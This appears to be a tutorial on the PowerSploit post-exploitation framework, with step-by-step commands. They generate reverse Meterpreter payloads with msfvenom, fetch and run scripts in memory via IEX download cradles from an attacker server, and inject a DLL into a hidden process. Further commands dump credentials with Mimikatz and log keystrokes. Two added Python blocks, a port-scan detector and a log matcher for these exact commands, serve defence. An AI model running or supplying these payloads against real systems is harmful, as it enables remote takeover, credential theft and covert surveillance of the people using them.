## Introduction

PowerSploit is a post-exploitation framework based on PowerShell. It contains many PowerShell attack scripts, mainly used for information gathering, privilege escalation and persistence after initial access.

https://github.com/mattifestation/PowerSploit
## Install and set up PowerSploit under Linux

1. Start the Apache service.
2. Put the downloaded archive in the /var/www/html directory to build a simple file server.
3. Open http://localhost/PowerSploit-master/ in the browser.
## Introduction to PowerSploit modules

- AntivirusBypass: finds the byte ranges that antivirus signatures match on
- CodeExecution: executes code on the target host
- Exfiltration: information-gathering tools run on the target host
- Mayhem: destructive scripts, such as a forced blue screen
- Persistence: backdoor scripts (maintaining control)
- Recon: uses the target host as a springboard for intranet reconnaissance
- ScriptModification: creates or modifies scripts on the target host
## PowerSploit module application

### Invoke-Shellcode

Invoke-Shellcode is the most commonly used script in the CodeExecution module. It injects shellcode into the process with the specified process ID, or into the local PowerShell process. Used together with MSF, the module is particularly effective.
### 1. Execute shellcode directly to get a reverse Meterpreter shell

First use the reverse_https payload in MSF for the reverse connection.

Use the msfvenom command to generate a PowerShell script trojan:

```bash
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.213.136 LPORT=4444 -f powershell -o /var/www/html/test
```

Then enter the following command in PowerShell on the target machine to download the script:

```powershell
iex(New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/CodeExecution/Invoke-Shellcode.ps1")
```

Then enter the following command to download the trojan:

```powershell
iex(New-Object Net.WebClient).DownloadString("http://192.168.213.136/test")
```

Then run the following in PowerShell:

```powershell
Invoke-Shellcode -Shellcode ($buf) -Force
```

`-Force` means execute directly without prompting. Return to the MSF listener and the reverse connection has been established.
### 2. Invoke-Portscan port scanning

Invoke-Portscan is a script under the Recon module, mainly used for port scanning, and it is very simple to use.

First download the script:

```powershell
IEX (New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/Recon/Invoke-Portscan.ps1")
```

Then use the following command to scan:

```powershell
Invoke-Portscan -Hosts 192.168.213.138,192.168.213.136 -Ports "80,22,3389,4444"
```
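From the network side, the scan above looks like a burst of connections from one source to several hosts on the same short list of ports within a few seconds. As an added example (not part of the original article and not PowerSploit code), the following Python flags that pattern in connection records. The records, the source addresses 10.0.0.5 and 10.0.0.9, and the thresholds (60-second window, six distinct host/port pairs) are all constructed for the demonstration; the destination hosts and ports are the ones used in the command above.

```python
from collections import defaultdict, deque

# Constructed connection records: (epoch seconds, source, destination, destination port).
# 10.0.0.5 sweeps two hosts on 80, 22, 3389 and 4444 within three seconds, as the
# Invoke-Portscan command above would; 10.0.0.9 is ordinary traffic to one service.
SAMPLE_FLOWS = [
    (1000, "10.0.0.5", "192.168.213.138", 80),
    (1000, "10.0.0.5", "192.168.213.138", 22),
    (1001, "10.0.0.5", "192.168.213.138", 3389),
    (1001, "10.0.0.5", "192.168.213.138", 4444),
    (1002, "10.0.0.5", "192.168.213.136", 80),
    (1002, "10.0.0.5", "192.168.213.136", 22),
    (1003, "10.0.0.5", "192.168.213.136", 3389),
    (1003, "10.0.0.5", "192.168.213.136", 4444),
    (1000, "10.0.0.9", "192.168.213.136", 443),
    (1400, "10.0.0.9", "192.168.213.136", 443),
    (1800, "10.0.0.9", "192.168.213.136", 443),
    (2200, "10.0.0.9", "192.168.213.138", 443),
]


def detect_scans(flows, window=60, min_targets=6):
    """Return {source: set of (destination, port)} for every source that contacts
    at least min_targets distinct destination/port pairs inside any window-second span.
    Both thresholds are assumed values; tune them to the network being monitored."""
    by_src = defaultdict(list)
    for ts, src, dst, port in flows:
        by_src[src].append((ts, dst, port))

    alerts = {}
    for src, events in by_src.items():
        events.sort()                      # sliding window needs time order
        recent = deque()
        for ts, dst, port in events:
            recent.append((ts, dst, port))
            while recent and recent[0][0] < ts - window:
                recent.popleft()           # drop records older than the window
            targets = {(d, p) for _, d, p in recent}
            if len(targets) >= min_targets:
                alerts.setdefault(src, set()).update(targets)
    return alerts


def scanned_ports(targets):
    """Distinct ports touched by one flagged source, sorted for reporting."""
    return sorted({port for _, port in targets})


if __name__ == "__main__":
    for src, targets in detect_scans(SAMPLE_FLOWS).items():
        hosts = sorted({dst for dst, _ in targets})
        print(f"{src}: {len(targets)} host/port pairs, hosts={hosts}, ports={scanned_ports(targets)}")
```

The window-based count catches a fast sweep regardless of the order in which hosts and ports are tried; a slow scan spread across hours needs a longer window or a per-day distinct-target count instead.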
### 3. Invoke-DllInjection DLL injection script

Invoke-DllInjection is a script under the CodeExecution module that performs DLL injection.

First download the script:

```powershell
IEX (New-Object Net.Webclient).DownloadString("http://192.168.213.136/PowerSploit-master/CodeExecution/Invoke-DllInjection.ps1")
```

Then use the following command in Kali to generate the DLL to inject (the default is 32-bit; to generate a 64-bit DLL, add x64 to the payload name):

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.213.136 lport=4444 -f dll -o /var/www/html/test.dll
```

After uploading the generated test.dll to the C drive of the target server, you can start a new process to inject into, which makes the injection less conspicuous. Use the following command to create a new hidden process named notepad.exe:

```powershell
Start-Process C:\Windows\System32\notepad.exe -WindowStyle Hidden
```

Then get the PID of notepad.exe, and inject with the following command:

```powershell
Invoke-DllInjection -ProcessID 5080 -Dll c:\test.dll
```

The injection succeeds. Return to the MSF listener for the reverse_tcp payload and the reverse connection has been established.
### 4. Invoke-Mimikatz information collection

Invoke-Mimikatz is a script under the Exfiltration module, used for information collection.

First download the script:

```powershell
IEX (New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/Exfiltration/Invoke-Mimikatz.ps1")
```

Then run the command:

```powershell
Invoke-Mimikatz -DumpCreds
invoke-mimikatz -Command "Privilege::Debug Sekurlsa::logonpasswords"
```
### 5. Get-Keystrokes keylogger

Get-Keystrokes is a script under the Exfiltration module, used for keylogging. It records keyboard input and mouse clicks together with the exact time of each.

First download the script:

```powershell
IEX (New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/Exfiltration/Get-Keystrokes.ps1")
```

Then execute the following command to turn on the keylogger:

```powershell
Get-Keystrokes -LogPath c:\key.txt
```
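Every script in sections 1, 3, 4 and 5 is fetched with the same in-memory download cradle (`IEX` wrapped around `Net.WebClient.DownloadString`) and then invoked by its function name, and the DLL-injection walkthrough additionally starts a hidden process. With PowerShell script block logging enabled, those command lines are recorded in Event ID 4104, so a defender can match on exactly these strings. The Python below is an added example, not from the original article or from PowerSploit: it runs that matching over constructed ScriptBlockText values built from the commands shown on this page. The event ids, the tag names and the benign entry are assumptions made for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed sample ScriptBlockText values (the field logged in Event ID 4104).
# They mirror the commands shown on this page and are not real log exports.
SAMPLE_EVENTS = [
    {"id": 1, "text": 'iex(New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/CodeExecution/Invoke-Shellcode.ps1")'},
    {"id": 2, "text": "Invoke-Shellcode -Shellcode ($buf) -Force"},
    {"id": 3, "text": "Get-ChildItem C:\\Users | Sort-Object Length"},   # benign, should not match
    {"id": 4, "text": 'IEX (New-Object Net.Webclient).DownloadString("http://192.168.213.136/PowerSploit-master/CodeExecution/Invoke-DllInjection.ps1")'},
    {"id": 5, "text": 'invoke-mimikatz -Command "Privilege::Debug Sekurlsa::logonpasswords"'},
    {"id": 6, "text": "Get-Keystrokes -LogPath c:\\key.txt"},
    {"id": 7, "text": "Start-Process C:\\Windows\\System32\\notepad.exe -WindowStyle Hidden"},
]

# IEX / Invoke-Expression applied to a WebClient.DownloadString result: the
# in-memory download cradle used for every script on this page.
CRADLE = re.compile(r"(?i)\b(iex|invoke-expression)\b.*new-object\s+net\.webclient.*downloadstring")
# Function names of the PowerSploit scripts discussed above. Matched case-insensitively,
# since PowerShell is case-insensitive and the page itself mixes cases (IEX/iex, invoke-mimikatz).
POWERSPLOIT = re.compile(r"(?i)\b(Invoke-Shellcode|Invoke-DllInjection|Invoke-Mimikatz|Invoke-Portscan|Get-Keystrokes)\b")
# A process launched with a hidden window, as in the DLL-injection walkthrough.
HIDDEN_START = re.compile(r"(?i)\bstart-process\b.*-windowstyle\s+hidden")
URL = re.compile(r"""https?://[^\s"')]+""")


def classify(text):
    """Return the list of indicator tags matched by one script-block text."""
    tags = []
    if CRADLE.search(text):
        tags.append("download_cradle")
    m = POWERSPLOIT.search(text)
    if m:
        tags.append("powersploit:" + m.group(1).lower())
    if HIDDEN_START.search(text):
        tags.append("hidden_process_start")
    return tags


def scan(events):
    """Return one finding per event that matched at least one indicator,
    keeping any URLs so the staging server can be identified."""
    findings = []
    for ev in events:
        tags = classify(ev["text"])
        if tags:
            findings.append({"id": ev["id"], "tags": tags, "urls": URL.findall(ev["text"])})
    return findings


def staging_hosts(findings):
    """Distinct hosts that scripts were downloaded from, for blocking and for scoping the investigation."""
    hosts = {urlparse(u).hostname for f in findings for u in f["urls"]}
    return sorted(h for h in hosts if h)


if __name__ == "__main__":
    results = scan(SAMPLE_EVENTS)
    for f in results:
        print(f["id"], ", ".join(f["tags"]), *f["urls"])
    print("staging hosts:", staging_hosts(results))
```

The cradle pattern fires on the download step even when the script that follows has been renamed, and the function-name pattern fires on the invocation even when the script was loaded some other way; alerting on either one alone, and escalating when both appear from the same host, covers all five walkthroughs on this page.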